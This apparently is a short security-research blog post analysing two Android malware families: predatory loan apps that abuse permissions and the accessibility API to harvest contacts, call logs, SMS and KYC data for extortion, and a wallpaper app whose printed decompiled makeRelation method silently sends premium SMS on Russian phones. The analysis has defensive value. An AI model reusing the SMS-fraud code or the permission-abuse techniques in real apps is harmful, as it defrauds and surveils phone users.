Open in app

Sign in

Write

Sign in

Phony Phones — Case Study 1&2

PurpleSynapz
2 min readApr 2, 2024

--

Case Study 1: Instant Loan Apps:-

Posing as a Loan facilitator, this app originates from a neighboring country which itself is bankrupt. The snippet extracted from the Android Manifest file associated with this malicious Moneyfine.apk Android app reveals the permissions utilized to engage in malicious activities.

In another case the biggest similar SDK, dubbed Loan Spy, abuses API accessibility to get access to WhatsApp messages, then guesses whether the user is legitimate based on their WhatsApp usage apart from the array of sensitive information on the user’s device: call log information, SMS messages, contact lists, GPS location data etc… What sets it apart is that Loan Spy also abuses the accessibility API to break the sandbox between Android apps which includes support tools like screen readers, input simulation, and other features that ignore the sandbox between applications enabling it to interact fully with all apps on the system.

Code review reveals that the app primarily exploits permissions for contacts, call logs, and camera access for selfie upload. The obfuscation level was minimal, and the app remained undetected by many antivirus programs, primarily because the exploited permissions were limited. The app functioned like a typical instant loan app and victims were made to complete the KYC process; however, KYC details were also utilized in the process of money extortion.

Case Study 2: Wallpaper Apps:-

From the early Android days, wallpaper apps pretended to offer home screen wallpapers for download. The SMS fraud functionality in com.kk4.SkypeWallpapers (v3, 8cab) checks whether it is running on a Russian phone and executes the makeRelation method to send an undisclosed premium SMS if so.

private void makeRelation(

String phoneNumber, String message, Context context) {

int v3_0 = 0;

AlertDialog.Builder v6_1 = AlertDialog.Builder(this);

v6_1.setMessage(“You don’t have enough permissions”);

v6_1.setCancelable(0);

v6_1.setNeutralButton(“OK”,

new com.kk4.SkypeWallpapers.AlertActivity$5(this));

PendingIntent v4_0 = PendingIntent.getBroadcast(

this, v3_0, new Intent(“SMS_SENT”), v3_0);

PendingIntent v5_0 = PendingIntent.getBroadcast(

this, v3_0, new Intent(“SMS_DELIVERED”), v3_0);

this.registerReceiver(

new com.kk4.SkypeWallpapers.AlertActivity$6(this, v6_1),

new IntentFilter(“SMS_SENT”));

SmsManager.getDefault().sendTextMessage(

phoneNumber, 0, message, v4_0, v5_0);

}

Malware
Cybersecurity
Infosec
Information Security
Cyber

--

--

PurpleSynapz

Written by PurpleSynapz

2 Followers

CyberSecurity Research Labs

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams